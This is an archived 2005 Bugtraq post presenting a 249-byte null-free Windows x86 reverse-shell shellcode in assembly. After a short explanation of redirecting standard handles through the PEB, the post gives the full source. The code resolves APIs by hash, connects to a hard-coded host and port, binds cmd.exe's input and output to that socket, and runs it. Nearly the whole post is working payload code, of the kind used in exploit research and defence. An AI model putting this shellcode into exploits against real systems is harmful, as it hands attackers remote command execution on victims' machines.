lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20050814224214.22272.qmail@securityfocus.com>
Date: 14 Aug 2005 22:42:14 -0000
From: msuiche@...il.com
To: bugtraq@...urityfocus.com
Subject: 249bytes reverse shellcode with "nooil tricks methods"


We use the PEB for the Output/Input/Error Handles.

typedef struct PEB
BOOLEAN InheritedAddressSpace ;
BOOLEAN ReadImageFileExecOptions ;
BOOLEAN BeingDebugged ;
BOOLEAN Spare ;
HANDLE Mutant ;
PVOID ImageBaseAddress ;
PPEB LDR DATA LoaderData ;
PRTL USER PROCESS PARAMETERS ProcessParameters ;
...
typedef struct RTL USER PROCESS PARAMETERS
ULONG MaximumLength ;
ULONG Length ;
ULONG Flags ;
ULONG DebugFlags ;
PVOID ConsoleHandle ;
ULONG ConsoleFlags ;
HANDLE StdInputHandle ; +18h
HANDLE StdOutputHandle ; +1Ch
HANDLE StdErrorHandle ; +20h
...

So with the nooil tricks we have now :
mov eax,dword ptr fs :[18h]
mov eax,dword ptr ds :[eax+30h]
mov eax,dword ptr ds :[eax+10h]
mov ecx, hClientSocket
mov dword ptr ds :[eax+18h],ecx ; SetStdHandle(STD INPUT HANDLE,hClientSocket) ;
mov dword ptr ds :[eax+1Ch],ecx ; SetStdHandle(STD OUTPUT HANDLE,hClientSocket) ;
mov dword ptr ds :[eax+20h],ecx ; SetStdHandle(STD ERROR HANDLE,hClientSocket) ;

249 bytes Reverse Generic Shellcode without loader(no null byte) : 

comment *
-----------------------------------------------------------------
---- New generation shellcode using my "nooil tricks" methods ---
----    (c) 2005 - Matthieu Suiche / msuiche@...il.com        ---
249 bytes Reverse Generic Shellcode without loader(no null byte)
-----------------------------------------------------------------
hehe hi metasploit's guys ;)
*
.386
.model flat, stdcall

assume fs:nothing

LoadLibraryA    equ 0D6C3D898h
WSAStartupA     equ 0C7B3B4CBh
WSASocketA      equ 0B8ACB6C6h
connect 		equ 06EE2D2C8h
system			equ 0E873E6D8h
ExitProcessA    equ 0D7D8EA95h
; ------------------------------
sin_addr		equ 0B01A8C0h ; 192.168.1.11
sin_port		equ 3713h	; 4919
; ------------------------------
str_cmd			equ 0FF646D63h

; ----------------------------------------------------
_nooil_ segment public ; writable section
;.
; ----- CODE ----- 
scode:	
	jmp short _eip
	GetEip:
	pop		edi
	jmp short EntryPoint
_eip:
	call	GetEip
Kernel32BaseAddr:
	pushad
	test	eax, eax
	jnz		MyGetProcAddr
	; eax = 0
	mov 	eax, dword ptr fs:[eax+30h]
	mov 	eax, dword ptr ds:[eax+0ch]
	mov 	esi, dword ptr ds:[eax+1ch]
	lodsd
	mov 	eax, dword ptr ds:[eax+08h]
MyGetProcAddr:
	mov		edx, eax
	
; - PE
	add		edx, dword ptr ds:[edx+3ch]
	
; - Export Table
	mov		edx, dword ptr ds:[edx+78h]
	add		edx, eax
	
	mov 	ebx, dword ptr ds:[edx+20h]
	add		ebx, eax
	
	xor		ecx, ecx
	mov		ebp, eax
	
FindAddr:
	inc		ecx
	mov     edi, dword ptr ds:[ebx+ecx*4]
	add		edi, eax

	mov		esi, dword ptr [edi]		
	add		esi, dword ptr [edi+4]
	cmp		esi, [esp+36]
	jz		AddrFound
	jmp		short FindAddr
	
AddrFound:

	mov     ebx, dword ptr ds:[edx+24h]
	add     ebx, ebp
	mov     cx,word ptr ds:[ebx+ecx*2]
	
	mov     ebx, dword ptr ds:[edx+1Ch]
	add     ebx, ebp
	add     ebp, dword ptr ds:[ebx+ecx*4]

	mov		dword ptr [esp+28], ebp
	popad
	retn

EntryPoint:
	xor		eax, eax
	xor		ecx, ecx
	push	LoadLibraryA
	call	edi							; MyGetProcAddr(LoadLibraryA);
	mov		ebp, eax
	
	push	cx
	push    word ptr '23'
	push    '_2sw'
	push	esp
	call	eax		; LoadLibraryA("ws2_32");
	
	mov		ebx, eax
	
	push	WSAStartupA
	call	edi		; MyGetProcAddr(WSAStartupA)
	
	
	mov		esi, esp
	add		si, -301h
	push	esi
	push	2
	call	eax		; WSAStartup(2,&WSAstruct);
	
	mov		eax, ebx
	
	push	WSASocketA
	call	edi		; MyGetProcAddr(WSASocketA);
	
	xor		esi, esi
	push	esi
	push	esi
	push	esi
	push	esi
	inc		esi
	push	esi
	inc		esi
	push	esi
	call	eax		; WSASocket(2,1,0,0,0,0);
	
	xchg	ebx, eax ; ebx = sockfd , eax = ws2_32

	push	sin_addr
	push	word ptr sin_port
	push	si
	mov		esi, esp
	
	push	connect
	call	edi		; MyGetProcAddr(connect)
	
	push	10h
	push	esi
	push	ebx
	call	eax		; connect(sockfd, &struct, sizeof(struct));
	
	push	ax
	push	word ptr 'tr'
	push	'cvsm'
	push	esp
	call	ebp		; LoadLibraryA("msvcrt");
	
	push	system
	call	edi		; MyGetProcAddr(system);

	; ----------------------------- nooil tricks ----------------------------------
	xor		ecx, ecx
	mov		ecx,dword ptr fs:[ecx+18h]
	mov		ecx,dword ptr ds:[ecx+30h]
	mov		ecx,dword ptr ds:[ecx+10h]
	mov		dword ptr ds:[ecx+18h],ebx ; SetStdHandle(STD_INPUT_HANDLE,hClient);
	mov     dword ptr ds:[ecx+1Ch],ebx ; SetStdHandle(STD_OUTPUT_HANDLE,hClient);
	mov     dword ptr ds:[ecx+20h],ebx ; SetStdHandle(STD_ERROR_HANDLE,hClient);
	; -----------------------------------------------------------------------------
	

	push    str_cmd
	inc		byte ptr [esp+3]
	push	esp
	call	eax	; system("cmd");
	
	; Exit
	push	ExitProcessA
	call	edi		; MyGetProcAddr(ExitProcessA)
	call	eax		; ExitProcessA();
end scode
; ------ END CODE ------
;.
_nooil_ ends
; ----------------------------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ